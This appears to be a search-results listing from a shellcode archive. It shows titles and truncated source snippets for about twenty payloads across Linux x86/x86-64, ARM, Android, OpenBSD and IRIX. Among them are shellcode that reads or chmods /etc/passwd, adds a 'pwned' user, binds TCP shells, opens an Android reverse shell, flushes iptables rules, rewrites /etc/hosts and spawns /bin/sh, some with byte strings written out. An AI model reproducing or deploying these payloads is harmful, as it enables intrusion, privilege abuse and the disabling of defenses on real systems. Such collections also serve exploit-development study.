7258 matches found
Linux/x86-64 - Read /etc/passwd Shellcode (82 bytes)
BITS 64 ; Author Mr.Un1k0d3r - RingZer0 Team ; Read /etc/passwd Linux x8664 Shellcode ; Shellcode size 82 bytes global start section .text start: jmp pushfilename readfile: ; syscall open file pop rdi ; pop path value ; NULL byte fix xor byte rdi + 11, 0x41 xor rax, rax add al, 2 xor rsi, rsi ; s...
Linux/x86-64 - Add User (pwned/$pass$) Using echo cmd Shellcode (273 bytes)
; shellcode name adduserpassword ; Author : Christophe G SLAE64-1337 ; Len : 273 bytes ; Language : Nasm ; "name = pwned ; pass = $pass$" ; add user and password with echo cmd ; tested kali linux , kernel 3.12 global start start: jmp short findaddress realstart: pop rdi xor byte rdi + 7 , 0x41 ;...
OpenBSD/x86 - reboot() Shellcode (15 bytes)
// ----------bsd/x86 reboot shellcode----------------- // AUTHOR : beosroot // INFO : OpenBSD x86 reboot shellcode // EMAIL : email protected // email protected char shellcode = "\x31\xc0\x66\xba\x0e\x27\x66\x81\xea\x06\x27\xb0\x37\xcd\x80"; int main int ret = int &ret + 2; ret = intshellcode; //...
Linux/x86-64 - Read /etc/passwd + Write To /tmp/outfile Shellcode (105 bytes)
; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-867.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 105 bytes got shorter by 13 bytes ; ; What's new is that some...
Linux/x86-64 - Bind TCP Stager (4444/TCP) + Egghunter Shellcode (157 bytes)
;Exam Assignment 3 ;implementation of egghunter ;Default egg = "deaddead" ; ;If connected the stager check of egg , if present execute the code ; ;You can send a maximum of 255 bytes egg + code ; ;if no egg , shellcode exit ; ;Christophe G SLAE64 - 1337 ; global start jmp short start startcode :...
Linux/x86-64 - shutdown -h now Shellcode (64 bytes)
; =================================================================== ; Optimized version of shellcode at: ; http://shell-storm.org/shellcode/files/shellcode-877.php ; Author: SLAE64-1351 Keyman ; Date: 14/09/2014 ; ; Length: 64 bytes got shorter by 1 byte :D ; ; What's new is that some...
Linux/x86-64 - Bind TCP (Random TCP Port) Shell Shellcode (57 bytes)
/ Shell Bind TCP Random Port Shellcode - C Language - Linux/x8664 Copyright C 2013 Geyslan G. Bem, Hacking bits http://hackingbits.com email protected This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free...
Linux/x86-64 - Bind TCP (31337/TCP) Shell Shellcode (150 bytes)
/ Title : tcpbindshell 150 bytes Date : 04 October 2013 Author : Russell Willis Testd on: Linux/x8664 SMP Debian 3.2.46-1+deb7u1 x8664 GNU/Linux $ objdump -D tcpbindshell -M intel tcpbindshell: file format elf64-x86-64 Disassembly of section .text: 0000000000400080 : 400080: 48 31 c0 xor rax,rax...
Linux/x86 - execve(/bin/sh) + Polymorphic Shellcode (26 bytes)
/ Description ; Title : Polymorphic execve /bin/sh - Shellcode ; Author : Hashim Jawad ; Website : ihack4falafel.com ; Twitter : @ihack4falafel ; SLAE ID : SLAE-1115 ; Purpose : spawn /bin/sh shell...
Linux/x86-64 - Flush IPTables Rules (execve("/sbin/iptables", ["/sbin/iptables", "-F"], NULL)) Shellcode (43 bytes)
/ section .text global start start: push 0x3b pop rax cdq push rdx push word 0x462d push rsp pop rcx push rdx mov rbx, 0x73656c6261747069 push rbx mov rbx, 0x2f2f2f6e6962732f...
Linux/x86-64 - Execute /bin/sh Shellcode (24 bytes)
/ global start section .text start: push 59 pop rax cdq push rdx mov rbx,0x68732f6e69622f2f push rbx push rsp pop rdi push rdx push rdi push rsp pop rsi syscall / include include char code =...
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (96 bytes)
/ global start section .text start: ;open push 2 pop rax xor rdi, rdi push rdi ; 0x00 mov rbx, 0x7374736f682f2f2f ; ///hosts push rbx mov rbx, 0x2f2f2f2f6374652f ; /etc//// push...
Linux/x86-64 - Add Map (127.1.1.1 google.lk) In /etc/hosts Shellcode (110 bytes)
/ ; Title: Add map in /etc/hosts file - 110 bytes ; Date: 2014-10-29 ; Platform: linux/x8664 ; Website: http://osandamalith.wordpress.com ; Author: Osanda Malith Jayathissa @OsandaMalith global start section .text start: ;open xor rax, rax add rax, 2 ; open syscall xor rdi, rdi xor rsi, rsi push...
Linux/StrongARM - Bind TCP /bin/sh Shell Shellcode (203 bytes)
/ 203 byte StrongARM/Linux bind portshell shellcode funkysh / char shellcode= "\x20\x60\x8f\xe2" / add r6, pc, 32 / "\x07\x70\x47\xe0" / sub r7, r7, r7 / "\x01\x70\xc6\xe5" / strb r7, r6, 1 / "\x01\x30\x87\xe2" / add r3, r7, 1 / "\x13\x07\xa0\xe1" / mov r0, r3, lsl r7 / "\x01\x20\x83\xe2" / add r...
Linux/ARM - execve (/bin/sh, [], [0 vars]) Shellcode (35 bytes)
/ Title : Linux/ARM - execve"/bin/sh", , 0 vars - 35 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
Android/ARM - Reverse TCP /system/bin/sh Shell (10.0.2.2:0x3412/TCP) Shellcode (79 bytes)
/ This ARM Thumb sc connects to a given IP and port with a shell. Intended for use with Android hence /system/bin/sh. Connects to the provided IP and port with a shell no null bytes in the code, but does this really matter these days? it could be fixed with just a few instructions. Released to th...
Linux/ARM - chmod(/etc/passwd, 0777) Shellcode (39 bytes)
/ Title : Linux/ARM - chmod"/etc/passwd", 0777 - 39 bytes Date : 2013-09-04 Author : gunslinger yuda at cr0security dot com Tested on : ARM1176 rev6 v6l An ARM Hardcoded Shellcode without 0x20, 0x0a, and 0x00. Cr0security.com / include char shellcode = "\x01\x60\x8f\xe2" // add r6, pc, 1...
IRIX - execve (/bin/sh -c) Shellcode (72 bytes)
char cmdshellcode= "\x04\x10\xff\xff" / bltzal $zero, / "\x24\x02\x03\xf3" / li $v0,1011 / "\x23\xff\x08\xf4" / addi $ra,$ra,2292 / "\x23\xe4\xf7\x40" / addi $a0,$ra,-2240 / "\x23\xe5\xfb\x24" / addi $a1,$ra,-1244 / "\xaf\xe4\xfb\x24" / sw $a0,-1244$ra / "\x23\xe6\xf7\x48" / addi $a2,$ra,-2232 /...
IRIX - execve (/bin/sh) Shellcode (68 bytes)
/ 68 byte MIPS/Irix PIC execve shellcode. -scut/teso / unsigned long int shellcode = 0xafa0fffc, / sw $zero, -4$sp / 0x24067350, / li $a2, 0x7350 / / dpatch: / 0x04d0ffff, / bltzal $a2, dpatch / 0x8fa6fffc, / lw $a2, -4$sp / / a2 = char envp = NULL / 0x240fffcb, / li $t7, -53 / 0x01e07827, / nor...
Linux/StrongARM - setuid() Shellcode (20 bytes)
/ 20 byte StrongARM/Linux setuid shellcode funkysh / char shellcode= "\x02\x20\x42\xe0" / sub r2, r2, r2 / "\x04\x10\x8f\xe2" / add r1, pc, 4 / "\x12\x02\xa0\xe1" / mov r0, r2, lsl r2 / "\x01\x20\xc1\xe5" / strb r2, r1, 1 / "\x17\x0b\x90\xef"; / swi 0x90ff17 /...